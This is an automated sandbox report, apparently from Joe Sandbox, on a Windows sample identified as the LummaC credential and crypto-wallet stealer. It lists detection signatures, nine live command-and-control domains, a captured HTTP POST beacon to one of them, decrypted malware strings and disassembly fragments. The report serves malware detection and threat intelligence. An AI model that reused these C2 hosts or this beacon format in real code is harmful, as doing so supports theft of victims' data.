Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PH1D3KHmOD.exe

Overview

General Information

Sample name:PH1D3KHmOD.exe
renamed because original name is a hash value
Original sample name:f1f1fb7ce16d5883ea795e1ebbafcf7a.exe
Analysis ID:1581225
MD5:f1f1fb7ce16d5883ea795e1ebbafcf7a
SHA1:76f16e6397a95661beeefa1ad5d033c819bdd884
SHA256:d01629b4c91f9bdffa26efc4e7666093d830ec350d4e7435ad525813645a6af9
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PH1D3KHmOD.exe (PID: 6656 cmdline: "C:\Users\user\Desktop\PH1D3KHmOD.exe" MD5: F1F1FB7CE16D5883EA795E1EBBAFCF7A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["prisonyfork.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "appliacnesot.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz"], "Build id": "d880--8lY"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T08:49:33.176795+010020283713Unknown Traffic192.168.2.449730172.67.165.185443TCP
      2024-12-27T08:49:35.367925+010020283713Unknown Traffic192.168.2.449731172.67.165.185443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T08:49:34.173741+010020546531A Network Trojan was detected192.168.2.449730172.67.165.185443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-27T08:49:34.173741+010020498361A Network Trojan was detected192.168.2.449730172.67.165.185443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: PH1D3KHmOD.exeAvira: detected
      Antivirus detection for URL or domain
      Source: https://mindhandru.buzz/api07Avira URL Cloud: Label: malware
      Source: https://mindhandru.buzz/apiYAvira URL Cloud: Label: malware
      Source: https://mindhandru.buzz/api##3YXAvira URL Cloud: Label: malware
      Source: https://mindhandru.buzz/eAvira URL Cloud: Label: malware
      Found malware configuration
      Source: PH1D3KHmOD.exe.6656.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "appliacnesot.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "hummskitnj.buzz", "rebuildeso.buzz"], "Build id": "d880--8lY"}
      Multi AV Scanner detection for submitted file
      Source: PH1D3KHmOD.exeVirustotal: Detection: 56%Perma Link
      Source: PH1D3KHmOD.exeReversingLabs: Detection: 60%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for sample
      Source: PH1D3KHmOD.exeJoe Sandbox ML: detected
      Sample uses string decryption to hide its real strings
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: hummskitnj.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: cashfuzysao.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: appliacnesot.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: screwamusresz.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: inherineau.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scentniej.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: rebuildeso.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: prisonyfork.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mindhandru.buzz
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
      Source: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
      Source: PH1D3KHmOD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edx, ebx0_2_000E8600
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_00121720
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0010C09E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov esi, ecx0_2_001090D0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0010E0DA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0010C0E6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_0010D116
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0010C09E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0010B170
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov eax, dword ptr [00126130h]0_2_000F8169
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_0010D17D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]0_2_00121160
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_001081CC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00116210
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_000FC300
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00120340
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0010D34A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_001083D8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_000E73D0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_000E73D0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov eax, ebx0_2_00107440
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_00107440
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov word ptr [eax], cx0_2_000F747D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov word ptr [edx], di0_2_000F747D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]0_2_0010C465
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0010C465
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00108528
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]0_2_000FB57D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edi, ecx0_2_0010A5B6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_001206F0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then jmp eax0_2_00109739
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]0_2_00107740
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov dword ptr [esp+20h], eax0_2_000E9780
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then jmp edx0_2_001037D6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then push esi0_2_000EC805
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00102830
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]0_2_0011C830
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0010C850
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_000FD8AC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_000FD8AC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov eax, ebx0_2_000FC8A0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]0_2_000FC8A0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]0_2_000FC8A0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]0_2_000FC8A0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_000FD8D8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_000FD8D8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edx, ecx0_2_000FB8F6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edx, ecx0_2_000FB8F6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_0011C990
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0010B980
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then jmp edx0_2_001039B9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_001039B9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_001089E9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00101A10
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then dec edx0_2_0011FA20
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h0_2_0011CA40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]0_2_000E8A50
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0010AAC0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then dec edx0_2_0011FB10
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edx, ecx0_2_000F8B12
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]0_2_000EAB40
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]0_2_000FEB80
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_000ECC7A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_000F4CA0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_00120D20
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edx, ecx0_2_00106D2E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then dec edx0_2_0011FD70
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]0_2_0011EDC1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_0011CDF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]0_2_0011CDF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_0011CDF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h0_2_0011CDF0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0010DDFF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then dec edx0_2_0011FE00
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0010DE07
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_00102E6D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then jmp edx0_2_00102E6D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_00102E6D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edx, ecx0_2_00109E80
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]0_2_000E2EB0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov ecx, eax0_2_0010BF13
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov edi, dword ptr [esp+28h]0_2_00105F1B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 4x nop then mov word ptr [eax], cx0_2_000F6F52

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.165.185:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.165.185:443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: prisonyfork.buzz
      Source: Malware configuration extractorURLs: screwamusresz.buzz
      Source: Malware configuration extractorURLs: scentniej.buzz
      Source: Malware configuration extractorURLs: inherineau.buzz
      Source: Malware configuration extractorURLs: appliacnesot.buzz
      Source: Malware configuration extractorURLs: mindhandru.buzz
      Source: Malware configuration extractorURLs: cashfuzysao.buzz
      Source: Malware configuration extractorURLs: hummskitnj.buzz
      Source: Malware configuration extractorURLs: rebuildeso.buzz
      Source: Joe Sandbox ViewIP Address: 172.67.165.185 172.67.165.185
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.165.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.165.185:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
      Source: PH1D3KHmOD.exe, 00000000.00000003.1734604183.00000000015B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microp
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000002.1735501001.00000000014FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
      Source: PH1D3KHmOD.exe, 00000000.00000003.1734709037.000000000155B000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000002.1735729903.000000000155C000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api##3YX
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api07
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735501001.00000000014FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiY
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735682639.0000000001542000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/e
      Source: PH1D3KHmOD.exe, 00000000.00000002.1735729903.0000000001571000.00000004.00000020.00020000.00000000.sdmp, PH1D3KHmOD.exe, 00000000.00000003.1734621764.0000000001571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49730 version: TLS 1.2

      System Summary

      barindex
      PE file contains section with special chars
      Source: PH1D3KHmOD.exeStatic PE information: section name:
      Source: PH1D3KHmOD.exeStatic PE information: section name: .idata
      Source: PH1D3KHmOD.exeStatic PE information: section name:
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E86000_2_000E8600
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FD0030_2_000FD003
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001640190_2_00164019
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C40040_2_001C4004
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000ED0210_2_000ED021
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0018F02B0_2_0018F02B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014605F0_2_0014605F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014905F0_2_0014905F
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014B0740_2_0014B074
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001540630_2_00154063
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001470680_2_00147068
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016306B0_2_0016306B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016D0940_2_0016D094
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A309E0_2_001A309E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010C09E0_2_0010C09E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015A0830_2_0015A083
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0015608D0_2_0015608D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001950B90_2_001950B9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001B50D10_2_001B50D1
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001760DB0_2_001760DB
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001980C80_2_001980C8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C80C50_2_001C80C5
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010A0CA0_2_0010A0CA
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014E0C80_2_0014E0C8
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F60E90_2_000F60E9
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C50F00_2_001C50F0
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C20ED0_2_001C20ED
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A20EF0_2_001A20EF
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010C0E60_2_0010C0E6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016F11A0_2_0016F11A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000EB1000_2_000EB100
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001601370_2_00160137
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001901360_2_00190136
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001821290_2_00182129
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AC15B0_2_001AC15B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001371540_2_00137154
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BF1500_2_001BF150
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010C09E0_2_0010C09E
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001A014C0_2_001A014C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016E1490_2_0016E149
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0019C1460_2_0019C146
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F81690_2_000F8169
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BB1760_2_001BB176
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000E61600_2_000E6160
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001791630_2_00179163
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002A61540_2_002A6154
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C61620_2_001C6162
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C919D0_2_001C919D
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0010E1800_2_0010E180
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BA18C0_2_001BA18C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0011F18B0_2_0011F18B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001091AE0_2_001091AE
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001AD1D60_2_001AD1D6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001081CC0_2_001081CC
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001781F20_2_001781F2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017B1F20_2_0017B1F2
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001651E60_2_001651E6
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0014F2350_2_0014F235
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000F12270_2_000F1227
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_000FE2200_2_000FE220
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001952520_2_00195252
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0016B2470_2_0016B247
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_0017024A0_2_0017024A
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001C027C0_2_001C027C
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_002AB24B0_2_002AB24B
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeCode function: 0_2_001BE2710_2_001BE271
